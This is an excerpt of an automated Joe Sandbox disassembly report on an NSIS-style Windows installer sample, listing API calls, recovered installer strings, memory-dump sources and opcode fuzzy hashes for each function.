                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                • String ID: f
                                                                                                • API String ID: 41195575-1993550816
                                                                                                • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                APIs
                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                • MulDiv.KERNEL32(00018A00,00000064,0033BF63), ref: 00403295
                                                                                                • wsprintfW.USER32 ref: 004032A5
                                                                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                Strings
                                                                                                • verifying installer: %d%%, xrefs: 0040329F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                • String ID: verifying installer: %d%%
                                                                                                • API String ID: 1451636040-82062127
                                                                                                • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                APIs
                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$Prev
                                                                                                • String ID: *?|<>/":
                                                                                                • API String ID: 589700163-165019052
                                                                                                • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                • String ID:
                                                                                                • API String ID: 1912718029-0
                                                                                                • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
APIs
• GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
• GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
• VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
• GlobalFree.KERNEL32(006B0240), ref: 00402387
Memory Dump Source
• Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
Similarity
• API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
• String ID:
• API String ID: 3376005127-0
• Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
• Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
• Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
• Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
APIs
• GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
• WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
• lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
• WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
Memory Dump Source
• Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
Similarity
• API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
• String ID:
• API String ID: 2568930968-0
• Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
• Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
• Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
• Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
APIs
• GetDlgItem.USER32(?), ref: 004020A3
• GetClientRect.USER32(00000000,?), ref: 004020B0
• LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
• SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
• DeleteObject.GDI32(00000000), ref: 004020EE
Memory Dump Source
• Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
• Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
• Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
• Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
APIs
• SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
• SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
• Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
• Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
• Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
APIs
• lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
• wsprintfW.USER32 ref: 00404483
• SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
Strings
Memory Dump Source
• Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
• Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
• Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
• Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
APIs
  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
• RegCloseKey.ADVAPI32(00000000), ref: 0040282E
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Strings
• DeleteRegKey: "%s\%s", xrefs: 00402843
• DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
Memory Dump Source
• Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
Similarity
• API ID: CloseDeleteOpenValuelstrlenwvsprintf
• String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
• API String ID: 1697273262-1764544995
• Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
• Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
• Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
• Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
APIs
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
  • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
  • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
• lstrlenW.KERNEL32 ref: 004026B4
• lstrlenW.KERNEL32(00000000), ref: 004026C1
• SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
Similarity
• API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
• String ID: CopyFiles "%s"->"%s"
• API String ID: 2577523808-3778932970
• Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
• Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
• Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
• Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
Similarity
• API ID: lstrcatwsprintf
• String ID: %02x%c$...
• API String ID: 3065427908-1057055748
• Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
• Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
• Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
• Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                Strings
Similarity
• API ID: InitializeMessageSendUninitializelstrlenwvsprintf
• String ID: Section: "%s"$Skipping section: "%s"
• API String ID: 2266616436-4211696005
• Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
• Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
• Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
• Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
APIs
• GetDC.USER32(?), ref: 00402100
• GetDeviceCaps.GDI32(00000000), ref: 00402107
• MulDiv.KERNEL32(00000000,00000000), ref: 00402117
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004255E0,771B23A0,00000000), ref: 00406902
• CreateFontIndirectW.GDI32(00420110), ref: 0040216A
  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
Similarity
• API ID: CapsCreateDeviceFontIndirectVersionwsprintf
• String ID:
• API String ID: 1599320355-0
• Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
• Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
• Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
• Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
APIs
  • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
• lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
• lstrcmpW.KERNEL32(?,Version ), ref: 00407276
• lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
Strings
Similarity
• API ID: lstrcpyn$CreateFilelstrcmp
• String ID: Version
• API String ID: 512980652-315105994
• Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
• Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
• Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
• Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
APIs
• DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
• GetTickCount.KERNEL32 ref: 00403303
• CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
• ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
• Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
• Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
• Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
APIs
• GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
• GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
• GlobalFree.KERNEL32(00000000), ref: 004063CA
Similarity
• API ID: Global$AddressAllocByteCharFreeMultiProcWide
• String ID:
• API String ID: 2883127279-0
• Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
• Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
• Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
• Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
APIs
• IsWindowVisible.USER32(?), ref: 0040492E
• CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
Strings
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
• Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
• Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
• Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
APIs
• GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
• lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
Strings
Similarity
• API ID: PrivateProfileStringlstrcmp
• String ID: !N~
• API String ID: 623250636-529124213
• Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
• Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
• Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
• Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
• CloseHandle.KERNEL32(?), ref: 00405C9D
Strings
• Error launching installer, xrefs: 00405C74
                                                                                                Similarity
                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                • String ID: Error launching installer
                                                                                                • API String ID: 3712363035-66219284
                                                                                                • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandlelstrlenwvsprintf
                                                                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                • API String ID: 3509786178-2769509956
                                                                                                • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
